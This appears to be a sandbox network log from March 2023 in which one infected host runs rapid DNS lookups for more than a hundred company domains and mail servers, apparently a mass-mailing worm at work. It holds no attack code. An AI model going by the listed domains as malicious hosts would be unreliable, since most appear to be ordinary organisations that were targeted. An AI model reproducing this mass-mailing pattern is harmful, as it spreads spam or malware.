                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.851829052 CET192.168.2.58.8.8.80x9a9cStandard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.870399952 CET192.168.2.58.8.8.80x6b38Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.886722088 CET192.168.2.58.8.8.80xade8Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.896413088 CET192.168.2.58.8.8.80x5b28Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.943161964 CET192.168.2.58.8.8.80x7decStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.964514971 CET192.168.2.58.8.8.80x4538Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.982637882 CET192.168.2.58.8.8.80xa532Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.009859085 CET192.168.2.58.8.8.80xb668Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.016468048 CET192.168.2.58.8.8.80xbd64Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.020674944 CET192.168.2.58.8.8.80xe878Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.030675888 CET192.168.2.58.8.8.80x7cd9Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.030778885 CET192.168.2.58.8.8.80xd641Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.038496017 CET192.168.2.58.8.8.80xb8e6Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.038973093 CET192.168.2.58.8.8.80xc17aStandard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.043186903 CET192.168.2.58.8.8.80x660eStandard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.076596022 CET192.168.2.58.8.8.80x25ceStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.165885925 CET192.168.2.58.8.8.80xba3aStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.184207916 CET192.168.2.58.8.8.80x43cdStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.347855091 CET192.168.2.58.8.8.80xfe45Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.349728107 CET192.168.2.58.8.8.80x9de1Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.454992056 CET192.168.2.58.8.8.80x35bbStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.534113884 CET192.168.2.58.8.8.80x7d79Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.569699049 CET192.168.2.58.8.8.80xd1fStandard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.569736958 CET192.168.2.58.8.8.80xe1c9Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.569818974 CET192.168.2.58.8.8.80xf19dStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.571717978 CET192.168.2.58.8.8.80x6e4dStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.574026108 CET192.168.2.58.8.8.80x2ae5Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.576797009 CET192.168.2.58.8.8.80x1280Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.579488039 CET192.168.2.58.8.8.80xb7d0Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.594342947 CET192.168.2.58.8.8.80x73dfStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.603296995 CET192.168.2.58.8.8.80xcca3Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.610460043 CET192.168.2.58.8.8.80x1c9Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.621753931 CET192.168.2.58.8.8.80x71d2Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.628957033 CET192.168.2.58.8.8.80x9bd3Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.637224913 CET192.168.2.58.8.8.80x852cStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.639136076 CET192.168.2.58.8.8.80x5a63Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.645826101 CET192.168.2.58.8.8.80xeecaStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.657675982 CET192.168.2.58.8.8.80x46a5Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.684474945 CET192.168.2.58.8.8.80x4912Standard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.746413946 CET192.168.2.58.8.8.80xd072Standard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.823275089 CET192.168.2.58.8.8.80x59d0Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.865946054 CET192.168.2.58.8.8.80xec84Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.869683981 CET192.168.2.58.8.8.80x5aa3Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.900058985 CET192.168.2.58.8.8.80xbbefStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.926980019 CET192.168.2.58.8.8.80x67dbStandard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.953072071 CET192.168.2.58.8.8.80xa1beStandard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.996619940 CET192.168.2.58.8.8.80xd5f6Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.996701956 CET192.168.2.58.8.8.80xefe5Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.996870995 CET192.168.2.58.8.8.80x3622Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.997039080 CET192.168.2.58.8.8.80xd49bStandard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.998095036 CET192.168.2.58.8.8.80x81d0Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.998095036 CET192.168.2.58.8.8.80xc023Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:26.998799086 CET192.168.2.58.8.8.80x2952Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.008368015 CET192.168.2.58.8.8.80xf847Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.012525082 CET192.168.2.58.8.8.80xb091Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.012940884 CET192.168.2.58.8.8.80xc30aStandard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.027334929 CET192.168.2.58.8.8.80x3d3aStandard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.042246103 CET192.168.2.58.8.8.80xd74cStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.081957102 CET192.168.2.58.8.8.80xac7aStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.169270992 CET192.168.2.58.8.8.80xda12Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.306443930 CET192.168.2.58.8.8.80x60ceStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.308170080 CET192.168.2.58.8.8.80xc96aStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.308492899 CET192.168.2.58.8.8.80xaa30Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.319489002 CET192.168.2.58.8.8.80x449fStandard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.332623005 CET192.168.2.58.8.8.80x7f31Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.350239038 CET192.168.2.58.8.8.80xbc6aStandard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.360856056 CET192.168.2.58.8.8.80xab00Standard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.415102005 CET192.168.2.58.8.8.80x77aeStandard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.415640116 CET192.168.2.58.8.8.80x8f5cStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.415640116 CET192.168.2.58.8.8.80x1460Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.511101007 CET192.168.2.58.8.8.80xc8d4Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.528342962 CET192.168.2.58.8.8.80xb201Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.532262087 CET192.168.2.58.8.8.80x634cStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.618956089 CET192.168.2.58.8.8.80xe16dStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.619278908 CET192.168.2.58.8.8.80x1280Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.671891928 CET192.168.2.58.8.8.80x77bdStandard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.686759949 CET192.168.2.58.8.8.80xb8e4Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.688494921 CET192.168.2.58.8.8.80x83b3Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.712544918 CET192.168.2.58.8.8.80xa194Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.712734938 CET192.168.2.58.8.8.80x2333Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.750746012 CET192.168.2.58.8.8.80x7800Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.784239054 CET192.168.2.58.8.8.80x7fcaStandard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.784404993 CET192.168.2.58.8.8.80x41c5Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.791985989 CET192.168.2.58.8.8.80x965dStandard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.825244904 CET192.168.2.58.8.8.80x7713Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.827383041 CET192.168.2.58.8.8.80xde0fStandard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.827861071 CET192.168.2.58.8.8.80xabb3Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.828897953 CET192.168.2.58.8.8.80x125eStandard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.843905926 CET192.168.2.58.8.8.80x42afStandard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.848177910 CET192.168.2.58.8.8.80xacc5Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.884073019 CET192.168.2.58.8.8.80xbd17Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.886192083 CET192.168.2.58.8.8.80x55cStandard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.947108984 CET192.168.2.58.8.8.80x54f5Standard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.981163979 CET192.168.2.58.8.8.80xb9dfStandard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:27.997168064 CET192.168.2.58.8.8.80xbc27Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.056914091 CET192.168.2.58.8.8.80x2a37Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.082104921 CET192.168.2.58.8.8.80xfd95Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.094652891 CET192.168.2.58.8.8.80xb476Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.097398996 CET192.168.2.5192.5.5.2410x96Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.120229006 CET192.168.2.5192.33.4.120xc0Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.147981882 CET192.168.2.5198.41.0.40xffStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.155354023 CET192.168.2.58.8.8.80x61d9Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.155354023 CET192.168.2.58.8.8.80xe195Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.156910896 CET192.168.2.58.8.8.80xcd7dStandard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.170286894 CET192.168.2.58.8.8.80x486cStandard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.172391891 CET192.168.2.58.8.8.80xdaStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.214706898 CET192.168.2.58.8.8.80x68bfStandard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.246540070 CET192.168.2.58.8.8.80xea50Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.264691114 CET192.168.2.58.8.8.80xaa30Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.274163961 CET192.168.2.58.8.8.80xf91Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.289608955 CET192.168.2.58.8.8.80x9e4Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.293817043 CET192.168.2.58.8.8.80x31e9Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.310306072 CET192.168.2.58.8.8.80xf0deStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.330049992 CET192.168.2.58.8.8.80x9f3bStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.353156090 CET192.168.2.58.8.8.80xc96aStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.387398005 CET192.168.2.58.8.8.80x7ebStandard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.398040056 CET192.168.2.58.8.8.80x8ca1Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.405647039 CET192.168.2.58.8.8.80x6076Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.417572975 CET192.168.2.58.8.8.80x6aa1Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.423122883 CET192.168.2.58.8.8.80xe48fStandard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.448760033 CET192.168.2.58.8.8.80x4e7dStandard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.617639065 CET192.168.2.58.8.8.80xbf1bStandard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.644258976 CET192.168.2.58.8.8.80x41c0Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.644392967 CET192.168.2.58.8.8.80xc9deStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.654191017 CET192.168.2.58.8.8.80x1280Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.744081020 CET192.168.2.58.8.8.80xefd0Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.888915062 CET192.168.2.5192.33.4.120xbfStandard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.917136908 CET192.168.2.5192.5.5.2410xe9Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.941905022 CET192.168.2.5128.8.10.900xfcStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.951345921 CET192.168.2.58.8.8.80xb143Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.977590084 CET192.168.2.58.8.8.80xf40Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.993197918 CET192.168.2.58.8.8.80x1064Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:28.996340990 CET192.168.2.58.8.8.80x9b28Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.072787046 CET192.168.2.58.8.8.80x4dd5Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.135711908 CET192.168.2.58.8.8.80x9bdfStandard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.135711908 CET192.168.2.58.8.8.80x553aStandard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.210441113 CET192.168.2.58.8.8.80xea50Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.253931999 CET192.168.2.58.8.8.80x35f3Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.257312059 CET192.168.2.58.8.8.80x6938Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.301743984 CET192.168.2.58.8.8.80x9d4dStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.306448936 CET192.168.2.58.8.8.80x2699Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.393855095 CET192.168.2.58.8.8.80xe9e4Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.432399988 CET192.168.2.58.8.8.80xed42Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.434775114 CET192.168.2.58.8.8.80x262Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.465758085 CET192.168.2.58.8.8.80x80b3Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.472556114 CET192.168.2.58.8.8.80x10a8Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.497271061 CET192.168.2.58.8.8.80x4143Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.498148918 CET192.168.2.58.8.8.80xad42Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.532330990 CET192.168.2.58.8.8.80xe03bStandard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.587959051 CET192.168.2.58.8.8.80xd611Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.590322971 CET192.168.2.58.8.8.80xc59aStandard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.632322073 CET192.168.2.58.8.8.80xa929Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.830594063 CET192.168.2.58.8.8.80xf6a7Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.912301064 CET192.168.2.58.8.8.80x40d2Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.014746904 CET192.168.2.58.8.8.80x2f58Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.038726091 CET192.168.2.58.8.8.80xd4a2Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.071266890 CET192.168.2.58.8.8.80x9675Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.108551025 CET192.168.2.58.8.8.80x5d57Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.137444019 CET192.168.2.58.8.8.80x5ccStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.207309008 CET192.168.2.58.8.8.80xa192Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.214361906 CET192.168.2.58.8.8.80xa253Standard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.220413923 CET192.168.2.58.8.8.80x21caStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.226411104 CET192.168.2.58.8.8.80xea50Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.260505915 CET192.168.2.58.8.8.80x84b8Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.390417099 CET192.168.2.58.8.8.80x515Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.597984076 CET192.168.2.58.8.8.80x8cd1Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.611505985 CET192.168.2.58.8.8.80xd648Standard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.611505985 CET192.168.2.58.8.8.80x52a5Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.621387005 CET192.168.2.58.8.8.80xf4cStandard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.678349018 CET192.168.2.58.8.8.80xe865Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.701550007 CET192.168.2.58.8.8.80x1280Standard query (0)actmin.comA (IP address)IN (0x0001)false
